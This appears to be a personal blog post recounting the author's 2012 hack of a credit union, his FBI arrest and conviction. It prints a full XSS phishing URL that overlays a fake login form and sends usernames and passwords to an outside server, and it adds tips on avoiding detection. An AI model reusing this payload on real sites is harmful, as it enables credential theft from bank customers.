I Hacked a Bank and Got Arrested in 2012

Knock Knock

Seeing as a decade has passed, I finally need to do it for me, to put it on paper how it happened. How I got busted by the FBI. On a warm summer day in mid-2012, I was asleep in my bedroom at approximately 4 in the afternoon. Nobody except me was home at the time. They arrived, peeping through my windows, but seeing as my mother was just getting home with my Grandma Butch, who coincidentally got me into computers in the first place, as a kid, with a Tandy 1500HD and DOS, saw some guys in suits buzzing around the house looking in windows. What happened between then, and me actually waking up, I am unsure. Where I come in, hearing my mother pounding very loudly on my bedroom door, which I kept locked while living at my parent’s house. “Marshall! Marshall, wake up!” she screamed. “What do you want? Go away, I’m sleeping”, I said. “The FBI is here.”, she said, as I rolled out of bed, her still hammering on the door. I opened the door and immediately said, “that’s not funny.” but as soon as I got a good look at her face, I knew it wasn’t a joke to her. I rounded the corner to the front door and opened it; before me was one larger agent, and another about the same height but slimmer build agent. The short conversation that transpired from here on went something like this:

“Marshall Whittaker?”
“Yes, what is this about?”
“Do you know anything about Truliant Federal Credit Union?”
“No, I don’t know what you’re talking about.”
“Well, we think you do.”
“Come in.”

The kitchen table

The slimmer one sat in the kitchen, at the breakfast room table, and told me to have a seat. My first thought was, what, this guy is telling me to have a seat where I live? I didn’t say anything and sat, as he was slapping a large vanilla envelope down on the glass top, all I could think of was that it felt like that scene out of the Matrix movie.

He tried to chat me up while the other agents were busily going in and out of my room, removing computers, and other electronic equipment that had storage, such as USB flash drives, my Playstation 3, burned CDs, etc. My memory gets a little blurry here as to what was actually said, a lot was going on. I do remember at one point, they were telling me what types of charges I was going to be indicted with, and my mother handed me an entire bottle of Klonopin, saying “I hope he never uses a computer again. Well, thanks for that, Mom. In hindsight, I never should have talked to them at all, and lawyered up immediately, but my entire family, including myself, is very naive regarding police interrogations. I ended up blabbing on myself, about how it happened, why I thought it was a good idea to post on a forum about it, offering to sell the hack for bitcoin, then going back the next day and removing the post. Why I was idiotic enough to march my ass down to Truliant’s office in Winston-Salem and tell them about how I had hacked them. Truliant’s CISO stated that the vulnerability had been in the source for over two years untouched. The hack was before bug bounties were commonplace, and because they were a financial institution, nobody else was dumb enough to poke the bee hive.

Source code

The actual hack? Technologically pathetic:

hxxp://www.truliantfcu.org/kb_landing.php?quickQuestionValue=blah%22%20id=%22silvercloudFrm%22%3E%3C/iframe%3E%3Cdiv%20name=%22fuckyou%22%20style=%22position:absolute;%20height:400px;%20width:850px;%20left:10;%20top:190;%20overflow:auto;%20z-index:99;%20background:%23fff;%22%3EPlease%20enter%20your%20Username%20and%20Password:%3Cbr%3E%3Cbr%3E%3Cform%20name=%22input%22%20action=%22http://joette.net/cgi-bin/unpw.pl%22%20method=%22post%22%3EUsername:%3Cinput%20type=%22text%22%20name=%22user%22%20/%3E%3Cbr%3EPassword:%20%3Cinput%20type=%22text%22%20name=%22pass%22%3E%3Cinput%20type=%22submit%22%20value=%22Login%22%20/%3E%3C/div%3E%3C/form%3E%20%3Ciframe%20style=%22border:0px;%20width:%200px;%20height:%200px;%22%20src=%22www.google.com%22%20%3C/iframe%3E&x=0&y=0&x=0&y=0           

The code will XSS a search page, hijacking it with some CSS to cover up the old page and create a new login-like page that uses embedded JavaScript that will send the login credentials off to an offsite server. Sometimes - just that simple.

Unintended consequences

Note: If you ever do anything illegal like this, DO NOT TALK ABOUT IT. EVER.

They reminded me that I did it over tor, which I suppose was by instinct, but it didn’t matter much if I was going to call them up, then go down to the office, then tell the damn FBI what I did when they asked, did it? I ended up finding this scrolled about 12 years back in Facebook Messenger, where I had shown a hacker buddy what I was up to as well. The single good thing about getting caught is that I can make this blog post without fear of being arrested again.

Note: Always encrypt your shit.

I had years of legal trouble and was finally convicted of two counts of computer crimes (count two: “Attempt to Unlawfully Obtain Information by Computer from a Financial Institution” for this action, then another count for an unrelated hack involving a Department of Defense database I dumped). Amid the investigation, they found an unencrypted USB hard drive with the later database on it, which I also received charges for. I was totally blacklisted from obtaining security clearance for 5 years after the end of two years of probation. I ended up working fast-food jobs for the next decade because of this. It still makes it difficult to find employment in infosec, so if you have an opening and think I may be a good fit let me know! My lawyer expresses that I am now, a decade later, available in my full capacity to work in the computer field. In the end, I’m left with this shiny piece of resume fodder:

Court Documents

Don’t do it, kids, it’s not nearly as funny when the men in black show up.

The whole thing was colossally stupid, but it does make for a fun party story.